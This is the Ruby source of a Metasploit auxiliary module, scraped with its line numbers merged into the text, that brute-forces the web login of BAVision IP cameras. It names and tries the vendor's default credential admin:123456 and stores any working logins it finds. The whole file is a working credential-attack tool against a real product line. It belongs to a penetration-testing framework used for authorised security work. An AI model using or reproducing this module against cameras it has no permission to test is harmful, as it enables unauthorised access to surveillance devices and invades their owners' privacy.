Path: blob/master/modules/auxiliary/scanner/http/bavision_cam_login.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'metasploit/framework/login_scanner/bavision_cameras'6require 'metasploit/framework/credential_collection'78class MetasploitModule < Msf::Auxiliary9include Msf::Exploit::Remote::HttpClient10include Msf::Auxiliary::AuthBrute11include Msf::Auxiliary::Report12include Msf::Auxiliary::Scanner1314def initialize(info = {})15super(16update_info(17info,18'Name' => 'BAVision IP Camera Web Server Login',19'Description' => %q{20This module will attempt to authenticate to an IP camera created by BAVision via the21web service. By default, the vendor ships a default credential admin:123456 to its22cameras, and the web server does not enforce lockouts in case of a bruteforce attack.23},24'Author' => [ 'sinn3r' ],25'License' => MSF_LICENSE,26'Notes' => {27'Reliability' => UNKNOWN_RELIABILITY,28'Stability' => UNKNOWN_STABILITY,29'SideEffects' => UNKNOWN_SIDE_EFFECTS30}31)32)3334register_options(35[36OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:123456', false])37]38)39end4041def scanner(ip)42@scanner ||= lambda {43cred_collection = build_credential_collection(44username: datastore['USERNAME'],45password: datastore['PASSWORD']46)4748if datastore['TRYDEFAULT']49# Add the default username and password50print_status("Default credential admin:123456 added to the credential queue for testing.")51cred_collection.add_public('admin')52cred_collection.add_private('123456')53end5455return Metasploit::Framework::LoginScanner::BavisionCameras.new(56configure_http_login_scanner(57host: ip,58port: datastore['RPORT'],59cred_details: cred_collection,60stop_on_success: datastore['STOP_ON_SUCCESS'],61bruteforce_speed: datastore['BRUTEFORCE_SPEED'],62connection_timeout: 5,63http_username: datastore['HttpUsername'],64http_password: datastore['HttpPassword']65)66)67}.call68end6970def report_good_cred(ip, port, result)71service_data = {72address: ip,73port: port,74service_name: 'http',75protocol: 'tcp',76workspace_id: myworkspace_id77}7879credential_data = {80module_fullname: self.fullname,81origin_type: :service,82private_data: result.credential.private,83private_type: :password,84username: result.credential.public,85}.merge(service_data)8687login_data = {88core: create_credential(credential_data),89last_attempted_at: DateTime.now,90status: result.status,91proof: result.proof92}.merge(service_data)9394create_credential_login(login_data)95end9697def report_bad_cred(ip, rport, result)98invalidate_login(99address: ip,100port: rport,101protocol: 'tcp',102public: result.credential.public,103private: result.credential.private,104realm_key: result.credential.realm_key,105realm_value: result.credential.realm,106status: result.status,107proof: result.proof108)109end110111def bruteforce(ip)112scanner(ip).scan! do |result|113case result.status114when Metasploit::Model::Login::Status::SUCCESSFUL115print_brute(:level => :good, :ip => ip, :msg => "Success: '#{result.credential}'")116report_good_cred(ip, rport, result)117when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT118vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)119report_bad_cred(ip, rport, result)120when Metasploit::Model::Login::Status::INCORRECT121vprint_brute(:level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'")122report_bad_cred(ip, rport, result)123end124end125end126127def run_host(ip)128unless scanner(ip).check_setup129print_brute(:level => :error, :ip => ip, :msg => 'Target is not BAVision IP camera web server.')130return131end132133bruteforce(ip)134end135end136137138